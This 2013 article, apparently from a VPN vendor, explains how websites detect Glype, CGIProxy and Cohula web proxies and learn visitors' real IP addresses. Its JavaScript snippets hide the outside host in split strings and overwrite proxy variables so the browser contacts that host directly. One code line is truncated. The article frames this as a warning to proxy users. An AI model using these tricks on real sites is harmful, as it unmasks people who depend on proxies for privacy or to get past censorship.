Web proxy detection and real IP address disclosure

Web proxies (or anonymizers) are widely used as a tool for bypassing restrictions on access to many web services. But there is a common misconception that a web proxy can hide your IP address. Turning off Java and Flash does not guarantee your anonymity, because someone can still learn your IP address via JavaScript. Since visiting most websites with JavaScript disabled makes no sense, using a web proxy for ensuring your anonymity could bring an unwanted situation.

Glype is currently the most popular open-source implementation of a web proxy. CGIProxy and Cohula are less popular, but have the same functionality. PHProxy and Zelune are used very often too.

To detect the usage of a web proxy, you can compare a real website address with the value of window.location.hostname, or check for the existence of a specific anonymizer's variables.

ginf.url // Glype
window["_proxy_jslib_SCRIPT_URL"] // CGIProxy
window["REAL_PROXY_HOST"] // Cohula

To learn a user's IP address, all you need to do is use some code in such a way that a web browser's request is sent not through a web proxy, but directly. For example, you can mask a website address (Cohula), divide the src attribute of the <script> tag between a few document.write functions (Glype), or redefine special variables used for making links (CGIProxy).

var our_proto = "https";
var our_host = "zorrovpn" + "." + "com"; // mask address
var our_request = "show-js-ip";

// Trick for CGIProxy
window["_proxy_jslib_THIS_HOST"] = our_host;
window["_proxy_jslib_SCRIPT_NAME"] = "/" + our_request + "?#";
  = our_proto + "://" + our_host + "/" + window["_proxy_jslib_SCRIPT_NAME"];

document.write('<script sr');
document.write('c="' + our_proto + ":" + '//' + our_host + '/' + our_request);

You might have noticed that CGIProxy replaces with _proxy1_varname any variable whose name begins with _proxy, so use window["_proxy_varname"] instead.

You can research some web proxy detection techniques using Firebug or other developer tools included in your browser.

To test this kind of IP address detection, visit this page via any anonymizer. For example, use hidemyass.com (Glype), anonymizer.ru (Cohula), or scusiblog.org (CGIProxy). Uncheck the "Remove scripts" option to turn on JavaScript.

Tested with the latest Cohula, CGIProxy 2.1.6, and Glype 1.4.4

Source code is available at https://zorrovpn.com/articles/web-proxy-detection.js

Turning off Java, Flash and JavaScript helps to decrease the risk of de-anonymization. But you can never be sure that HTML filtering by a web proxy is always absolutely accurate. To avoid IP address disclosure, use VPN, SOCKS 4/5, HTTP proxy, SSH tunnels, Tor, I2P, and other technologies, combining them for better anonymity.

15.07.2013 © ZorroVPN

show comments